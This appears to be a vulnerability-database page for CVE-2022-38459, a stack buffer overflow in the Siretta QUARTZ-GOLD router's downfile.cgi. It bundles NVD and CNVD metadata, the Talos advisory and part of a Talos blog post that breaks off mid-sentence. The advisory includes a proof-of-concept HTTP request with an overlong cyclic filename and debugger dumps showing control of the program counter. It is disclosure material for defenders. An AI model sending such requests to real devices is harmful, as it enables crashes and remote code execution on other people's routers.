DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2022-38459", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-38459", "description": "A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "published": "2023-01-26T22:15:00", "modified": "2023-02-02T17:22:00", "epss": [{"cve": "CVE-2022-38459", "epss": 0.0008, "percentile": 0.32916, "modified": "2023-06-03"}], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38459", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2022-1608"], "cvelist": ["CVE-2022-38459"], "immutableFields": [], "lastseen": "2023-06-03T14:56:31", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cnvd", "idList": ["CNVD-2023-17080"]}, {"type": "talos", "idList": ["TALOS-2022-1608"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6"]}]}, "score": {"value": 2.3, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-38459", "epss": 0.0008, "percentile": 0.32775, "modified": "2023-05-02"}], "vulnersScore": 2.3}, "_state": {"dependencies": 1685838547, "score": 1685805531, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "838972c5f2cf55a20f9a0a71890b0358"}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "score": 7.2}}}, "cpe": ["cpe:/o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020"], "cpe23": ["cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*"], "cwe": ["CWE-120"], "affectedSoftware": [{"cpeName": "siretta:quartz-gold_firmware", "version": "g5.0.1.5-210720-141020", "operator": "eq", "name": "siretta quartz-gold firmware"}], "affectedConfiguration": [{"name": "siretta quartz-gold", "cpeName": "siretta:quartz-gold", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:siretta:quartz-gold_firmware:g5.0.1.5-210720-141020:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:siretta:quartz-gold:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1608", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1608", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}], "product_info": [{"vendor": "Siretta", "product": "QUARTZ-GOLD"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"lang": "en", "description": "CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')", "type": "CWE", "cweId": "CWE-120"}]}], "exploits": []}

{"cnvd": [{"lastseen": "2023-03-15T05:24:59", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a buffer overflow vulnerability that could be exploited by an attacker to cause remote code execution by sending a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17080)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38459"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17080", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17080", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1608\n\n## Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38459\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to download a previously uploaded file:\n \n \n void downfile.cgi(void)\n \n {\n [...]\n \n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename = \"\";\n if (_filename_param != (char *)0x0) {\n filename = _filename_param;\n }\n [... calculate base_folder ...]\n if (*filename != '\\0') {\n sprintf(buff,\"Content-Disposition:attachment;filename=\\\"%s\\\"\",(char)filename);\n send_header(200,buff,\"application/tomato-binary-file\",0);\n sprintf(buff,\"%s/%s\",base_folder,filename); [2]\n do_file(buff); [3]\n }\n return;\n }\n \n\nThe `downfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be downloaded. At `[1]` the uploaded parameter is taken and then used at `[2]`. The function used at `[2]` is a `sprintf`, which does not take into consideration the size of the buffer. If the `_filename` parameter is longer than a certain length, the instruction at `[2]` would cause a stack-based buffer overflow that could led to remote code execution.\n\n### Crash Information\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x61666b61 (\"akfa\"?)\n $r5 : 0x61676b61 (\"akga\"?)\n $r6 : 0x61686b61 (\"akha\"?)\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ef39070 \u2192 \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x61696b60 (\"`kia\"?)\n $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ef39070\u2502+0x0000: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\" \u2190 $sp\n 0x7ef39074\u2502+0x0004: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0008: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x000c: \"akmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39080\u2502+0x0010: \"aknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39084\u2502+0x0014: \"akoaakpaakqaakraaksaaktaak\"\n 0x7ef39088\u2502+0x0018: \"akpaakqaakraaksaaktaak\"\n 0x7ef3908c\u2502+0x001c: \"akqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:THUMB \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x61696b60\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0x61696b60 in ?? (), reason: SIGSEGV\n \n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /downfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 1119\n \n _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>\n \n\nThe status at the return address of the `downfile.cgi` function would be:\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r5 : 0x00031082 \u2192 \"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]\"\n $r6 : 0x0002272b \u2192 \"/jffs\"\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ef39060 \u2192 \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x0000f96c \u2192 pop {r4, r5, r6, pc}\n $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ef39060\u2502+0x0000: \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\" \u2190 $sp\n 0x7ef39064\u2502+0x0004: \"akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]\"\n 0x7ef39068\u2502+0x0008: \"akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]\"\n 0x7ef3906c\u2502+0x000c: \"akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39070\u2502+0x0010: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39074\u2502+0x0014: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0018: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x001c: \"akmaaknaakoaakpaakqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n 0xf960 mov r0, sp\n 0xf964 bl 0xbbc8\n 0xf968 add sp, sp, #1024 ; 0x400\n \u2192 0xf96c pop {r4, r5, r6, pc}\n [!] Cannot disassemble from $PC\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0xf96c in ?? (), reason: BREAKPOINT\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n [#0] 0xf96c \u2192 pop {r4, r5, r6, pc}\n [#1] 0x2ae3bb30 \u2192 free()\n \n\nSo the next instruction will populate the `pc` with the fourth dword contained in the stack, so:\n \n \n gef\u27a4 hexdump dw $sp\n 0x7ef39060\u2502+0x0000 0x61666b61 \n 0x7ef39064\u2502+0x0004 0x61676b61 \n 0x7ef39068\u2502+0x0008 0x61686b61 \n 0x7ef3906c\u2502+0x000c 0x61696b61 \n [...]\n \n\nAfter the pop the `pc` will contain the `0x61696b61` value.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1610\n\nPrevious Report\n\nTALOS-2022-1609\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38459"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1608", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2023-02-02T20:12:34", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, 